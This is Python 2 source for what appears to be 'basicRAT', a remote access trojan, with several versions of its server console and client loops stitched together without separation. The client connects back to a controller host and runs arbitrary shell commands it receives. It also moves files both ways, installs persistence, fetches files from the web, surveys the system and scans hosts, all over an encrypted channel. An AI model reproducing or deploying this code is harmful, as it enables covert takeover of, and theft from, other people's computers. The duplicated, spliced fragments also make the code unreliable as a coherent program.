def send(self, prompt, cmd, action):
if not self.alive:
print 'Error: Client not connected.'
return
# send prompt to client
crypto.sendGCM(self.conn, self.GCM, self.IV, prompt)
self.conn.settimeout(1)
self.IV += 1
# kill client connection
if cmd == 'kill':
self.conn.close()
# download a file
elif cmd == 'download':
for fname in action.split():
fname = fname.strip()
if os.path.isfile(fname):
print 'Error: File name already exists.'
return
filesock.recvfile(self.conn, self.GCM, fname)
# send file
elif cmd == 'upload':
for fname in action.split():
fname = fname.strip()
if not os.path.isfile(fname):
print 'Error: File not found.'
return
filesock.sendfile(self.conn, self.GCM, self.IV, fname)
# regenerate DH key
elif cmd == 'rekey':
self.dh_key = crypto.diffiehellman(self.conn, server=True)
# results of execute, persistence, scan, survey, unzip, or wget
elif cmd in [
'execute', 'persistence', 'scan', 'survey', 'unzip', 'wget'
]:
print 'Running {}...'.format(cmd)
recv_data = crypto.recvGCM(self.conn, self.GCM).rstrip()
print recv_data
def main():
parser = get_parser()
args = vars(parser.parse_args())
port = args['port']
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.bind(('0.0.0.0', port))
except socket.error:
print 'Error: Unable to start server, port {} in use?'.format(port)
sys.exit(1)
for line in BANNER.split('\n'):
time.sleep(0.05)
print line
print 'basicRAT server listening on port {}...'.format(port)
s.listen(10)
conn, addr = s.accept()
DHKEY = diffiehellman(conn, server=True)
while True:
prompt = raw_input('\n[{}] basicRAT> '.format(addr[0])).rstrip()
# allow noop
if not prompt:
continue
# seperate prompt into command and action
cmd, _, action = prompt.partition(' ')
# ensure command is valid before sending
if cmd not in COMMANDS:
print 'Invalid command, type "help" to see a list of commands.'
continue
# display help text
if cmd == 'help':
print HELP_TEXT
continue
# send data to client
conn.send(AES_encrypt(prompt, DHKEY))
# stop server
if cmd == 'quit':
s.close()
sys.exit(0)
# results of command
elif cmd == 'run':
recv_data = conn.recv(4096)
print AES_decrypt(recv_data, DHKEY).rstrip()
# download a file
elif cmd == 'download':
for fname in action.split():
fname = fname.strip()
recvfile(conn, fname, DHKEY)
# send file
elif cmd == 'upload':
for fname in action.split():
fname = fname.strip()
sendfile(conn, fname, DHKEY)
# regenerate DH key
elif cmd == 'rekey':
DHKEY = diffiehellman(conn, server=True)
# results of survey, persistence, unzip, or wget
elif cmd in ['scan', 'survey', 'persistence', 'unzip', 'wget']:
print 'Running {}...'.format(cmd)
recv_data = conn.recv(1024)
print AES_decrypt(recv_data, DHKEY)
def main():
s = socket.socket()
s.connect((HOST, PORT))
DHKEY = crypto.diffiehellman(s)
while True:
data = s.recv(1024)
data = crypto.AES_decrypt(data, DHKEY)
# seperate prompt into command and action
cmd, _, action = data.partition(' ')
# stop client
if cmd == 'quit':
s.close()
sys.exit(0)
# run command
elif cmd == 'run':
results = subprocess.Popen(action, shell=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
stdin=subprocess.PIPE)
results = results.stdout.read() + results.stderr.read()
s.sendall(crypto.AES_encrypt(results, DHKEY))
# send file
elif cmd == 'download':
for fname in action.split():
fname = fname.strip()
filesock.sendfile(s, fname, DHKEY)
# receive file
elif cmd == 'upload':
for fname in action.split():
fname = fname.strip()
filesock.recvfile(s, fname, DHKEY)
# regenerate DH key
elif cmd == 'rekey':
DHKEY = crypto.diffiehellman(s)
# apply persistence mechanism
elif cmd == 'persistence':
results = persistence.run(PLAT_TYPE)
s.send(crypto.AES_encrypt(results, DHKEY))
# download a file from the web
elif cmd == 'wget':
results = toolkit.wget(action)
s.send(crypto.AES_encrypt(results, DHKEY))
# unzip a file
elif cmd == 'unzip':
results = toolkit.unzip(action)
s.send(crypto.AES_encrypt(results, DHKEY))
# run system survey
elif cmd == 'survey':
results = survey.run(PLAT_TYPE)
s.send(crypto.AES_encrypt(results, DHKEY))
# run a scan
elif cmd == 'scan':
results = scan.single_host(action)
s.send(crypto.AES_encrypt(results, DHKEY))
def main():
s = socket.socket()
s.connect((HOST, PORT))
dh_key = crypto.diffiehellman(s)
GCM = crypto.AES_GCM(dh_key)
IV = 0
s.setblocking(0)
while True:
#data = s.recv(1024)
#data = crypto.AES_decrypt(data, dh_key)
data = crypto.recvGCM(s, GCM)
IV += 1
if not data:
continue
# seperate prompt into command and action
cmd, _, action = data.partition(' ')
# stop client
if cmd == 'kill':
s.close()
sys.exit(0)
# run command
elif cmd == 'execute':
results = subprocess.Popen(action,
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
stdin=subprocess.PIPE)
results = results.stdout.read() + results.stderr.read()
crypto.sendGCM(s, GCM, IV, results)
# send file
elif cmd == 'download':
for fname in action.split():
fname = fname.strip()
filesock.sendfile(s, GCM, fname)
# receive file
elif cmd == 'upload':
for fname in action.split():
fname = fname.strip()
filesock.recvfile(s, GCM, IV, fname)
# regenerate DH key
elif cmd == 'rekey':
dh_key = crypto.diffiehellman(s)
# apply persistence mechanism
elif cmd == 'persistence':
results = persistence.run(PLAT_TYPE)
crypto.sendGCM(s, GCM, IV, results)
#s.send(crypto.AES_encrypt(results, dh_key))
# download a file from the web
elif cmd == 'wget':
results = toolkit.wget(action)
crypto.sendGCM(s, GCM, IV, results)
#s.send(crypto.AES_encrypt(results, dh_key))
# unzip a file
elif cmd == 'unzip':
results = toolkit.unzip(action)
crypto.sendGCM(s, GCM, IV, results)
#s.send(crypto.AES_encrypt(results, dh_key))
# run system survey
elif cmd == 'survey':
results = survey.run(PLAT_TYPE)
crypto.sendGCM(s, GCM, IV, results)
#s.send(crypto.AES_encrypt(results, dh_key))
# run a scan
elif cmd == 'scan':
results = scan.single_host(action)
crypto.sendGCM(s, GCM, IV, results)